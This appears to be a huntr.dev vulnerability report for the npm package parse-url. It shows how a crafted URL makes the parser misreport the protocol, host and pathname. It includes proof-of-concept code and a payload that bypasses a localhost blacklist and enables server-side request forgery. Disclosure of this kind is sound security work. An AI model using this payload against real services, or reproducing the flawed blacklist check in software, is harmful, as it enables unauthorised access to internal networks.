Lucene search

Ranjit-git1B4C972A-ABC8-41EB-A2E1-696DB746B5FD

HistoryAug 03, 2022 - 11:54 a.m.

parser bypass and make SSRF attack

2022-08-0311:54:37

ranjit-git

www.huntr.dev

parser

ssrf

blacklist

domain

security

EPSS

0.002

Percentile

51.4%

JSON

parse-url inproperly detecting protocol,resource and Pathname .
This allow to bypass protocol check . Also this bug make ssrf check bypass

lets check normal url result for parse-url

import parseUrl from "parse-url";
console.log(parseUrl("http://nnnn@localhost:808/?id=xss"))

{
  protocols: [ 'http' ],
  protocol: 'http',
  port: '808',
  resource: 'localhost',
  host: 'localhost:808',
  user: 'nnnn',
  password: '',
  pathname: '/',
  hash: '',
  search: 'id=xss',
  href: 'http://nnnn@localhost:808/?id=xss',
  query: { id: 'xss' },
  parse_failed: false
}

Now provide bellow crafted url to confuse the parse-url .

import parseUrl from "parse-url";
console.log(parseUrl("http://nnnn@localhost:808:/?id=xss"))

response

{
  protocols: [ 'ssh' ],
  protocol: 'ssh',
  port: '',
  resource: 'nnnn@localhost',
  host: 'nnnn@localhost',
  user: 'git',
  password: '',
  pathname: '/808',
  hash: '',
  search: '',
  href: 'http://nnnn@localhost:808:/?id=xss',
  query: {},
  parse_failed: false
}

Here in this output see it incorrectly detecting the protocol,resource,pathname, and user param

SSRF BYPASS and access blacklist domain

lets assume developer set blackList domain localhost

import parseUrl from "parse-url";
import fetch from 'node-fetch';
var parsed=parseUrl("http://nnnn@localhost:808:/?id=xss")
if(parsed.resource=="localhost"){
console.log("internal network access is blocked")
}
else{
   const response = await fetch('http://'+parsed.resource+parsed.pathname);
        console.log(response)
 }

Crafted url payload is http://nnnn@localhost:808:/?id=xss

EPSS

0.002

Percentile

51.4%

JSON

Related for 1B4C972A-ABC8-41EB-A2E1-696DB746B5FD